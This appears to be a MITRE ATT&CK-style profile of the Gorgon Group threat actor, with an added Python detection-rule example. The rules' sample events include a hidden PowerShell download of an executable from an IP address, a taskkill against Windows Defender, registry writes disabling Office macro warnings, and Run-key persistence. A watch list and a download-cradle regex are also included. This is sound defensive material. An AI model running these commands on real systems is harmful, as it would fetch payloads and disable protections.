Gorgon Group

Gorgon Group is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. [1]

ID: G0078
Version: 1.2

Techniques Used

Domain | ID | Name | Use
Enterprise | T1059 | Command-Line Interface | Gorgon Group malware can use cmd.exe to download and execute payloads and to execute commands on the system. [1]
Enterprise | T1140 | Deobfuscate/Decode Files or Information | Gorgon Group malware can decode contents from a Base64-encoded payload and write the decoded contents to a file. [1]
Enterprise | T1089 | Disabling Security Tools | Gorgon Group malware can attempt to disable security features in Microsoft Office and Windows Defender using the taskkill command. [1]
Enterprise | T1106 | Execution through API | Gorgon Group malware can leverage the Windows API call CreateProcessA() for execution. [1]
Enterprise | T1112 | Modify Registry | Gorgon Group malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under HKCU\Software\Microsoft\Office\. [1]
Enterprise | T1086 | PowerShell | Gorgon Group malware can use PowerShell commands to download and execute a payload and to open a decoy document on the victim's machine. [1]
Enterprise | T1093 | Process Hollowing | Gorgon Group malware can use process hollowing to inject one of its trojans into another process. [1]
Enterprise | T1055 | Process Injection | Gorgon Group malware can download a remote access tool, ShiftyBug, and inject it into another process. [1]
Enterprise | T1060 | Registry Run Keys / Startup Folder | Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence. [1]
Enterprise | T1105 | Remote File Copy | Gorgon Group malware can download additional files from C2 servers. [1]
Enterprise | T1064 | Scripting | Gorgon Group has used macros in spearphishing attachments and has executed VBScripts on victim machines. [1]
Enterprise | T1023 | Shortcut Modification | Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence. [1]
Enterprise | T1193 | Spearphishing Attachment | Gorgon Group sent emails to victims with malicious Microsoft Office documents attached. [1]
Enterprise | T1065 | Uncommonly Used Port | Gorgon Group has used a variant of ShiftyBug that communicates with its C2 server over port 6666. [1]
Enterprise | T1204 | User Execution | Gorgon Group attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails. [1]
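The rows above describe behaviours that are all visible in ordinary endpoint telemetry (process creation, registry writes, network connections). The following is an added example, written for this page and not part of ATT&CK or of any vendor's rule set: a small set of detection rules that map back to the techniques in the table, run over constructed Sysmon-style events. The event field names, the Windows Defender process names used as a taskkill watch list, and the Office value names treated as security settings are assumptions chosen for the example; the page itself only says that "several keys and values under HKCU\Software\Microsoft\Office\" are modified.

```python
"""Detection rules for the Gorgon Group behaviours listed in the table above.

Added example for this page, not ATT&CK content or a vendor rule set. Rules:
Office app spawning a shell (T1193/T1204/T1064), PowerShell download cradle
(T1086), taskkill against a security process (T1089), Office security value
written under HKCU (T1112), Run key pointing at a .lnk (T1060/T1023) and an
outbound connection on port 6666 (T1065). Field names and watch lists are assumed.
"""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
# Assumed watch list of Windows Defender process names a taskkill would target.
SECURITY_PROCS = {"msmpeng.exe", "nissrv.exe", "mssense.exe"}
# Assumed Office value names that weaken macro or Protected View defences.
OFFICE_SECURITY_VALUES = {"vbawarnings", "accessvbom", "disableattachementsinpv",
                          "disableinternetfilesinpv", "disableunsafelocationsinpv"}
C2_PORT = 6666
DOWNLOAD_CRADLE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|\s-enc",
    re.IGNORECASE)
# Sysmon records user hives as HKU\<SID>\..., not HKCU\...; accept both forms.
USER_HIVE = re.compile(r"^(hkcu|hku\\[^\\]+)\\", re.IGNORECASE)


def image_name(path):
    """Lower-cased basename of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def user_hive_path(key):
    """Lower-cased path below the user hive, or None if the key is not under a user hive."""
    lowered = key.lower()
    if not USER_HIVE.match(lowered):
        return None
    return USER_HIVE.sub("", lowered, count=1)


def office_spawns_shell(ev):
    return (ev["type"] == "process"
            and image_name(ev["parent_image"]) in OFFICE_APPS
            and image_name(ev["image"]) in SHELLS)


def powershell_download_cradle(ev):
    return (ev["type"] == "process"
            and image_name(ev["image"]) == "powershell.exe"
            and DOWNLOAD_CRADLE.search(ev["command_line"]) is not None)


def taskkill_security_process(ev):
    if ev["type"] != "process" or image_name(ev["image"]) != "taskkill.exe":
        return False
    cmd = ev["command_line"].lower()
    return any(proc in cmd for proc in SECURITY_PROCS)


def office_security_value_write(ev):
    if ev["type"] != "registry":
        return False
    path = user_hive_path(ev["target_object"])
    if path is None or not path.startswith("software\\microsoft\\office\\"):
        return False
    return path.rsplit("\\", 1)[-1] in OFFICE_SECURITY_VALUES


def run_key_points_at_lnk(ev):
    if ev["type"] != "registry":
        return False
    path = user_hive_path(ev["target_object"]) or ev["target_object"].lower()
    return ("\\currentversion\\run\\" in path
            and ev["details"].strip('"').lower().endswith(".lnk"))


def c2_on_port_6666(ev):
    return ev["type"] == "network" and ev.get("dest_port") == C2_PORT


RULES = [
    ("T1193/T1204/T1064 Office app spawned a shell", office_spawns_shell),
    ("T1086 PowerShell download cradle", powershell_download_cradle),
    ("T1089 taskkill against a security process", taskkill_security_process),
    ("T1112 Office security value modified under HKCU", office_security_value_write),
    ("T1060/T1023 Run key persistence via .lnk", run_key_points_at_lnk),
    ("T1065 outbound connection on port 6666", c2_on_port_6666),
]


def run_rules(events):
    """Return (event index, rule name) for every rule that fires on each event."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES if rule(ev)]


# Constructed sample events, not captured telemetry; paths and addresses are made up.
SAMPLE_EVENTS = [
    {"type": "process", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c start /min update.vbs"},
    {"type": "process", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://203.0.113.10/p.exe','C:\\Users\\u\\AppData\\Local\\Temp\\p.exe')"},
    {"type": "process", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\taskkill.exe", "command_line": "taskkill /F /IM MsMpEng.exe"},
    {"type": "registry", "target_object": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings",
     "details": "DWORD (0x00000001)"},
    {"type": "registry", "target_object": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update",
     "details": r"C:\Users\u\AppData\Roaming\update.lnk"},
    {"type": "network", "image": r"C:\Users\u\AppData\Local\Temp\p.exe", "dest_ip": "203.0.113.10", "dest_port": 6666},
    # Benign activity that must not fire.
    {"type": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "command_line": "powershell Get-ChildItem C:\\"},
    {"type": "registry", "target_object": r"HKCU\Software\Microsoft\Office\16.0\Word\Options\BackgroundSave", "details": "DWORD (0x00000001)"},
    {"type": "network", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "dest_ip": "198.51.100.7", "dest_port": 443},
]

if __name__ == "__main__":
    for idx, name in run_rules(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

Two of the rules carry the caveat a practitioner would expect: the Run-key rule only fires when the value data points at a .lnk, which is the specific pattern the table describes, so a Run key pointing straight at an executable needs a separate rule; and the port-6666 rule is a weak indicator on its own, since the page only attributes that port to one ShiftyBug variant, so it is best used as corroboration alongside the process and registry rules rather than as a standalone alert.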

Software

ID | Name | References | Techniques
S0336 | NanoCore | [1] | Audio Capture, Command-Line Interface, Disabling Security Tools, Input Capture, Modify Registry, Obfuscated Files or Information, Registry Run Keys / Startup Folder, Remote File Copy, Scripting, Standard Cryptographic Protocol, System Network Configuration Discovery, Uncommonly Used Port, Video Capture
S0385 | njRAT | [1] | Application Window Discovery, Command-Line Interface, Custom Command and Control Protocol, Data Encoding, Data from Local System, Disabling Security Tools, File and Directory Discovery, File Deletion, Input Capture, Modify Registry, Peripheral Device Discovery, Registry Run Keys / Startup Folder, Remote Desktop Protocol, Remote File Copy, Remote System Discovery, Replication Through Removable Media, Screen Capture, System Information Discovery, System Owner/User Discovery, Uncommonly Used Port, Video Capture
S0262 | QuasarRAT | [1] | Code Signing, Command-Line Interface, Connection Proxy, Credential Dumping, Credentials in Files, Input Capture, Masquerading, Modify Registry, Remote Desktop Protocol, Remote File Copy, Scheduled Task, Standard Cryptographic Protocol, System Information Discovery, Video Capture
S0332 | Remcos | [1] | Audio Capture, Bypass User Account Control, Clipboard Data, Command-Line Interface, Connection Proxy, File and Directory Discovery, Input Capture, Modify Registry, Obfuscated Files or Information, Process Injection, Registry Run Keys / Startup Folder, Remote File Copy, Screen Capture, Scripting, Video Capture, Virtualization/Sandbox Evasion

References